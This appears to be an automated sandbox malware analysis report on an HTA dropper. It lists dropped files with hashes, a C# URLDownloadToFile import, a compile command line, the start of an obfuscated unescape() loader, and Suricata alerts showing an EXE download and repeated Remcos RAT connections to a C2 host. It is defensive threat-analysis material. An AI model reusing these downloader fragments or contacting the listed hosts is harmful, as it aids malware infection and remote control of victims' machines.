                                                                            C:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.110431696877216
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEak7Ynqq6PN5Dlq5J:+RI+ycuZhNyakS6PNnqX
                                                                            MD5:14731998021894BA7E8B051AC0269C98
                                                                            SHA1:FE2434A0EDD15CB30CE9500C0DB19DFEE469A71D
                                                                            SHA-256:F58483E4E1012062F88FBE20B4060414383DD952FBCC9ACB0DB7760CC7788D66
                                                                            SHA-512:0A5004C4E8AAE2BD57636E12CA05684007B08D5FA161573B78F2C0BCDA3E77E77447385E7D7741FC318FA12D85670EE28F10B54CC8D2767679F3EBEA5A470D92
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.e.a.h.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.x.p.e.a.h.v.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                            C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.0.cs

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (379)
                                                                            Category:dropped
                                                                            Size (bytes):493
                                                                            Entropy (8bit):3.8361876809299056
                                                                            Encrypted:false
                                                                            SSDEEP:6:V/DsYLDS81zuO2XkmMGlhjQXReKJ8SRHy4HfPKkasYl6feKbB5RiQy:V/DTLDfuPXkKOXfHDy9IfHtOQy
                                                                            MD5:00DF4AE943D803CB15795B1FD55EAD94
                                                                            SHA1:FC1509B646D150CC4D1C2D92CF772BE4AF67716B
                                                                            SHA-256:E8D13D324B35FC23A6729CAA22125343BFEBB09476A9334E93E8C1804CE6314A
                                                                            SHA-512:E40826E83F25A3BE3FDF26C1D5A667D0EB40D53D3F0FE46F8CC395152CD1EB46B98E193FC3A3F06B6CEFADBED030D2A90A5575C1D235228D53D5F152D2E85796
                                                                            Malicious:false
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace NlOCs.{. public class iRDSu. {. [DllImport("urlmoN.dlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr KbuKoVjoaLe,string pYfI,string LkFGOOQrPHR,uint WsxOTFQEep,IntPtr AhXQ);.. }..}.

                                                                            C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):369
                                                                            Entropy (8bit):5.272729074822539
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fj3lPR0zxs7+AEszIwkn23fj3lPrn:p37Lvkmb6KRf4WZEif1
                                                                            MD5:7C3C6C43BD704F864742FAE473212C36
                                                                            SHA1:9072C79765023DD3F1018074D139710FABFB3168
                                                                            SHA-256:4E4857FF5EB61C2C0DE34733E813F83D895E93474D41B50BDDC2E9DA920DED3D
                                                                            SHA-512:2CD7CEEA26F38ADD5CF2D09BB3FD74A73322DFDE92775EE9B0FEDC849FC17E8EE8D91B87510FC5D563FE6A29F46E33FFD547B6F4B9E2C316AC470DAA3FB5BD45
                                                                            Malicious:true
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.0.cs"

                                                                            C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dll

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):2.8577112736187114
                                                                            Encrypted:false
                                                                            SSDEEP:24:etGSgpeYYLPl78OxUlkal/uPvobKYtkZf2qTyAFWI+ycuZhNyakS6PNnq:6vYwPlIOSWPvobkJ2q+91ulya32q
                                                                            MD5:6832164D07DC0FCDCEABC3581300E961
                                                                            SHA1:88995BF9C4428B26CDF3501882C161E326237B3B
                                                                            SHA-256:F599F514289D11EE18A699434495393E3AEE5D811D7F62D60548DB8F40AB2215
                                                                            SHA-512:872D06421FF08F43FF3CE6215FEA759EA44FAC22B9DEAAACC25D4B798B6CD2BFBA58AE631FF8C1EB5FB8321014706D623C55F1639CDF1BFBC09077241D07665B
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`i`g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,...................................................... :.....P ......L.........R.....^.....c.....o.....z...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.jx

                                                                            C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.out

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):867
                                                                            Entropy (8bit):5.3164567838097225
                                                                            Encrypted:false
                                                                            SSDEEP:24:KJBqd3ka6KRfJEifQKax5DqBVKVrdFAMBJTH:Cika6CJEuQK2DcVKdBJj
                                                                            MD5:80713E831E24461EBD87E885DE5FEF1A
                                                                            SHA1:A41BE9AF238945EAD20E0B63FF54AA88AB7C4EB3
                                                                            SHA-256:AB8C528531C65E6EA63721554F6ACE31383EA578D3D970DCC01D66C84216503A
                                                                            SHA-512:E9A50E31CE9172D18EE9F06852D337BA1AF39C9ECAD7168C668F5FFBD5832A1832E7C745500BBC7D697998F62F3039C6F84636F2B8CD18C8EB5F36E7DBC0418C
                                                                            Malicious:false
                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                            C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):540672
                                                                            Entropy (8bit):6.60558566420824
                                                                            Encrypted:false
                                                                            SSDEEP:6144:1oO3gcLssxNY5nm9zzeuQMdKNuCsXVkm4MrVGFlujcbDxnrTtF0xyOOOtwFt4rmk:1oQYsM5nm9nR81sFkTXwjcBrAbOOteQ
                                                                            MD5:A2D03C5333BFECCA62720CD6EE3A4DC4
                                                                            SHA1:CE4C380F2748F375904C17B38D4F93E294FEF4F6
                                                                            SHA-256:EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                                                                            SHA-512:5C9DB8BB415DA332C0ADC24519AE0410A65ABA932DE15A682CE57EFBC61B8B7D7E5E3548164909A5DA5BC6966C351528626655FDBB7C21F3B4FD1974406AE04C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                            Joe Sandbox View:
                                                                            • Filename: crreatedbestthingswithgreatattitudeneedforthat.hta, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G...........................`............`.......................Rich...................PE..L...a..e............................R.............@.................................t..........................................(....p..h=..................................................P8.......8..@............................................text.............................. ..`.data...........d..................@....rsrc...h=...p...>..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                            Category:dropped
                                                                            Size (bytes):1835008
                                                                            Entropy (8bit):4.465525083504039
                                                                            Encrypted:false
                                                                            SSDEEP:6144:JIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNNdwBCswSbL:6XD94+WlLZMM6YFH/+L
                                                                            MD5:AAF8FBAADCE18AFD434BA41E6C78C15A
                                                                            SHA1:0D8D36FEF7B48DA4650B461E4AD6B964871A5FD3
                                                                            SHA-256:44865EC247A321488D16764BEACEE8AAD0D7C75C84C50C5A46685AB80367AD69
                                                                            SHA-512:6853BC59AEC58D1570432A747F2DABC90BD2424BF33AC3C446CE0D61BFADBE7FEEA8276110D8C3B31535E79248EB8024F93C0926F0C92F387ECB0A80823A8F7A
                                                                            Malicious:false
                                                                            Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"....O..............................................................................................................................................................................................................................................................................................................................................SW..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:HTML document, ASCII text, with very long lines (65451), with CRLF line terminators
                                                                            Entropy (8bit):2.6668302746742327
                                                                            TrID:
                                                                              File name:newthingswithgreatupdateiongivenbestthingswithme.hta
                                                                              File size:146'553 bytes
                                                                              MD5:fd6fc3abb81de5133fb2de54b937ca20
                                                                              SHA1:241f7fa153504078a9a9b07f966f3c4e862a9545
                                                                              SHA256:73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
                                                                              SHA512:5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516
                                                                              SSDEEP:768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl
                                                                              TLSH:7EE36F63C9DF9838E6BBBDBBE71C7B3B11436F4EE8898597069C49D00DD11867128B84
                                                                              File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by ufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-16T17:30:28.928530+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11192.3.179.16680192.168.2.449730TCP
                                                                              2024-12-16T17:30:29.310927+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21192.3.179.16680192.168.2.449730TCP
                                                                              2024-12-16T17:30:37.463478+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449731107.173.4.162560TCP
                                                                              2024-12-16T17:30:40.729168+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449732107.173.4.162560TCP
                                                                              2024-12-16T17:30:43.911956+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449734107.173.4.162560TCP
                                                                              2024-12-16T17:30:46.979534+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449737107.173.4.162560TCP
                                                                              2024-12-16T17:30:50.058328+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449740107.173.4.162560TCP
                                                                              2024-12-16T17:30:53.199623+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449742107.173.4.162560TCP
                                                                              2024-12-16T17:30:56.518752+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449743107.173.4.162560TCP
                                                                              2024-12-16T17:30:59.594117+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449744107.173.4.162560TCP
                                                                              2024-12-16T17:31:02.738356+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449745107.173.4.162560TCP
                                                                              2024-12-16T17:31:05.840521+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449746107.173.4.162560TCP
                                                                              2024-12-16T17:31:08.903925+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449747107.173.4.162560TCP
                                                                              2024-12-16T17:31:12.005673+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449748107.173.4.162560TCP
                                                                              2024-12-16T17:31:15.057924+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449749107.173.4.162560TCP
                                                                              2024-12-16T17:31:18.120444+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449750107.173.4.162560TCP
                                                                              2024-12-16T17:31:21.183831+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449752107.173.4.162560TCP
                                                                              2024-12-16T17:31:24.262126+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449758107.173.4.162560TCP
                                                                              2024-12-16T17:31:27.417659+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449765107.173.4.162560TCP
                                                                              2024-12-16T17:31:30.480124+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449776107.173.4.162560TCP
                                                                              2024-12-16T17:31:33.563539+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449782107.173.4.162560TCP
                                                                              2024-12-16T17:31:36.621978+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449792107.173.4.162560TCP
                                                                              2024-12-16T17:31:39.831861+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449799107.173.4.162560TCP
                                                                              2024-12-16T17:31:42.909917+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449804107.173.4.162560TCP
                                                                              2024-12-16T17:31:46.063526+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449814107.173.4.162560TCP
                                                                              2024-12-16T17:31:49.172233+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449820107.173.4.162560TCP
                                                                              2024-12-16T17:31:52.246851+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449827107.173.4.162560TCP
                                                                              2024-12-16T17:31:55.347908+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449837107.173.4.162560TCP
                                                                              2024-12-16T17:31:58.428007+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449843107.173.4.162560TCP
                                                                              2024-12-16T17:32:01.557935+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449852107.173.4.162560TCP
                                                                              2024-12-16T17:32:05.289148+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449860107.173.4.162560TCP
                                                                              2024-12-16T17:32:08.375879+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449868107.173.4.162560TCP
                                                                              2024-12-16T17:32:11.645186+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449877107.173.4.162560TCP
                                                                              2024-12-16T17:32:14.716900+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449884107.173.4.162560TCP
                                                                              2024-12-16T17:32:17.857163+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449894107.173.4.162560TCP
                                                                              2024-12-16T17:32:21.078162+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449899107.173.4.162560TCP
                                                                              2024-12-16T17:32:24.131784+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449906107.173.4.162560TCP
                                                                              2024-12-16T17:32:27.393382+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449915107.173.4.162560TCP
                                                                              2024-12-16T17:32:30.366328+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449922107.173.4.162560TCP
                                                                              2024-12-16T17:32:33.299389+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449929107.173.4.162560TCP
                                                                              2024-12-16T17:32:36.169190+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449938107.173.4.162560TCP
                                                                              2024-12-16T17:32:39.032418+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449945107.173.4.162560TCP
                                                                              2024-12-16T17:32:41.859982+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449951107.173.4.162560TCP
                                                                              2024-12-16T17:32:44.685978+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449959107.173.4.162560TCP
                                                                              2024-12-16T17:32:47.466166+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449968107.173.4.162560TCP
                                                                              2024-12-16T17:32:50.263798+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449974107.173.4.162560TCP
                                                                              2024-12-16T17:32:53.027684+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449980107.173.4.162560TCP
                                                                              2024-12-16T17:32:55.731756+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449987107.173.4.162560TCP
                                                                              2024-12-16T17:32:58.435921+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449993107.173.4.162560TCP
                                                                              2024-12-16T17:33:01.111052+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450003107.173.4.162560TCP
                                                                              2024-12-16T17:33:03.754623+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450009107.173.4.162560TCP
                                                                              2024-12-16T17:33:06.392061+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450015107.173.4.162560TCP
                                                                              2024-12-16T17:33:09.001423+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450022107.173.4.162560TCP
                                                                              2024-12-16T17:33:11.627020+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450028107.173.4.162560TCP
                                                                              2024-12-16T17:33:14.205806+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450038107.173.4.162560TCP
                                                                              2024-12-16T17:33:16.784252+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450044107.173.4.162560TCP
                                                                              2024-12-16T17:33:19.329978+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450049107.173.4.162560TCP
                                                                              2024-12-16T17:33:21.926481+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450055107.173.4.162560TCP
                                                                              2024-12-16T17:33:24.475070+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450059107.173.4.162560TCP
                                                                              2024-12-16T17:33:27.049050+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450060107.173.4.162560TCP
                                                                              2024-12-16T17:33:29.548833+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450061107.173.4.162560TCP
                                                                              2024-12-16T17:33:32.019962+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450062107.173.4.162560TCP
                                                                              2024-12-16T17:33:34.467071+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450063107.173.4.162560TCP
                                                                              2024-12-16T17:33:36.968098+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450064107.173.4.162560TCP
                                                                              2024-12-16T17:33:39.408042+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450065107.173.4.162560TCP
                                                                              2024-12-16T17:33:41.846513+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450066107.173.4.162560TCP
                                                                              2024-12-16T17:33:44.250391+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450067107.173.4.162560TCP
                                                                              2024-12-16T17:33:46.675082+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450068107.173.4.162560TCP
                                                                              2024-12-16T17:33:49.064098+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450069107.173.4.162560TCP
                                                                              2024-12-16T17:33:51.488115+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450070107.173.4.162560TCP
                                                                              2024-12-16T17:33:53.962241+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450071107.173.4.162560TCP
                                                                              2024-12-16T17:33:56.377519+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450072107.173.4.162560TCP
                                                                              2024-12-16T17:33:58.890768+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450073107.173.4.162560TCP
                                                                              2024-12-16T17:34:01.357874+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450074107.173.4.162560TCP
                                                                              2024-12-16T17:34:03.826995+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450075107.173.4.162560TCP
                                                                              2024-12-16T17:34:06.331131+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450076107.173.4.162560TCP
                                                                              2024-12-16T17:34:08.752658+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450077107.173.4.162560TCP
                                                                              2024-12-16T17:34:11.163417+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450078107.173.4.162560TCP
                                                                              2024-12-16T17:34:13.640104+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450079107.173.4.162560TCP
                                                                              2024-12-16T17:34:16.084200+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450080107.173.4.162560TCP
                                                                              2024-12-16T17:34:18.650734+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450081107.173.4.162560TCP
                                                                              2024-12-16T17:34:21.062809+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450082107.173.4.162560TCP
                                                                              2024-12-16T17:34:23.576702+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450083107.173.4.162560TCP
                                                                              2024-12-16T17:34:26.009269+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450084107.173.4.162560TCP
                                                                              2024-12-16T17:34:28.541837+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450085107.173.4.162560TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 16, 2024 17:30:27.665678978 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:27.786505938 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:27.786592960 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:27.786887884 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:27.908534050 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.926110029 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.926193953 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:28.926609993 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.926624060 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.926673889 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:28.928529978 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.928543091 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.928586006 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:28.930706024 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.930726051 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.930780888 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:28.932929039 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.932941914 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.932986021 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:28.935069084 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:28.935117960 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.046210051 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.046322107 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.046761990 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.046818018 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.118520021 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.118596077 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.118858099 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.118940115 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.122484922 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.122665882 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.122900009 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.122962952 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.131454945 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.131525040 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.131819963 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.131881952 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.140064001 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.140125990 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.140655994 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.140708923 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.148106098 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.148168087 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.148514032 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.148564100 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.156697035 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.156758070 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.157135010 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.157186031 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.167500019 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.167512894 CET8049730192.3.179.166192.168.2.4
